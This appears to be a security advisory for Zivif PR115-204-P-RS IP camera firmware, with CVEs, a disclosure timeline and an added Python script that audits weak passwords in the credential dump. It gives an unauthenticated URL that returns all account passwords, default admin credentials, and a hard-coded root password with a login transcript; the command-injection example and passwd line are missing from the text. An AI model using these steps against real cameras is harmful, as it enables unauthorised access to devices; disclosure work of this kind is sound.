Zivif PR115-204-P-RS Bypass / Command Injection / Hardcoded Password

Zivif PR115-204-P-RS cameras running firmware version V2.3.4.2103 suffer from authentication bypass, command injection, and hardcoded password vulnerabilities.


Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <[email protected]>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on social media that CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in a HackerStrip comic.
10 December 2017: This email

Implementation of access controls in Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106):
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255";
var name1="guest"; var password1="guest"; var authLevel1="3";
var name2="admin2"; var password2="admin"; var authLevel2="3";
var name3=""; var password3=""; var authLevel3="3";
var name4=""; var password4=""; var authLevel4="3";
var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3";
var name7=""; var password7=""; var authLevel7="3";
var name8=""; var password8=""; var authLevel8="0";
var name9=""; var password9=""; var authLevel9="0

Credentials are returned in cleartext to the requester.
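As an added example (not part of the advisory), the following parses the cleartext getuser reply shown above into account records and flags accounts that still carry the default or username-equal passwords, so an operator can audit what a camera exposes; the response text is a constructed sample mirroring the format on the page.

```python
import re

# Constructed sample of the cleartext reply the advisory shows for
# param.cgi?cmd=getuser (the real reply is one long line of JS assignments).
SAMPLE_RESPONSE = (
    'var name0="admin"; var password0="admin"; var authLevel0="255"; '
    'var name1="guest"; var password1="guest"; var authLevel1="3"; '
    'var name2="admin2"; var password2="admin"; var authLevel2="3"; '
    'var name3=""; var password3=""; var authLevel3="3";'
)

# One assignment: var <field><slot>="<value>"
_ASSIGN = re.compile(r'var\s+(name|password|authLevel)(\d+)="([^"]*)"')


def parse_getuser(body):
    """Turn the nameN/passwordN/authLevelN assignments into per-slot records.

    Empty slots are kept so the caller can see how many account slots the
    firmware exposes, not just the configured ones.
    """
    slots = {}
    for field, idx, value in _ASSIGN.findall(body):
        slots.setdefault(int(idx), {})[field] = value
    return [dict(slot=i, **slots[i]) for i in sorted(slots)]


def audit_accounts(records, admin_level="255"):
    """Flag configured accounts with trivially guessable passwords.

    Flags a password equal to the username or to 'admin' (the defaults the
    advisory shows), and any admin-level account with a password shorter
    than 8 characters. Returns a list of (username, reason) tuples.
    """
    findings = []
    for r in records:
        name, pw = r.get("name", ""), r.get("password", "")
        if not name:
            continue  # unused slot
        if pw in (name, "admin"):
            findings.append((name, "default or username-equal password"))
        elif r.get("authLevel") == admin_level and len(pw) < 8:
            findings.append((name, "short password on admin-level account"))
    return findings
```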

While exploring further, unauthenticated remote command injection is possible using

Command results are not returned to the requester, but the commands are executed by the system.

One last finding was that the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):

The encrypted password is cat1029.

(none) login: root
Login incorrect
(none) login: root
Welcome to SONIX.
\[email protected]\h:\W$
Because of the way the file system is structured, changing this password
requires more work than running passwd.

The hi3510 is shared with a couple of other cameras I'm exploring. The
motd saying /Welcome to SONIX/ has led me to speculate parts of this
firmware may be shared with other cameras.
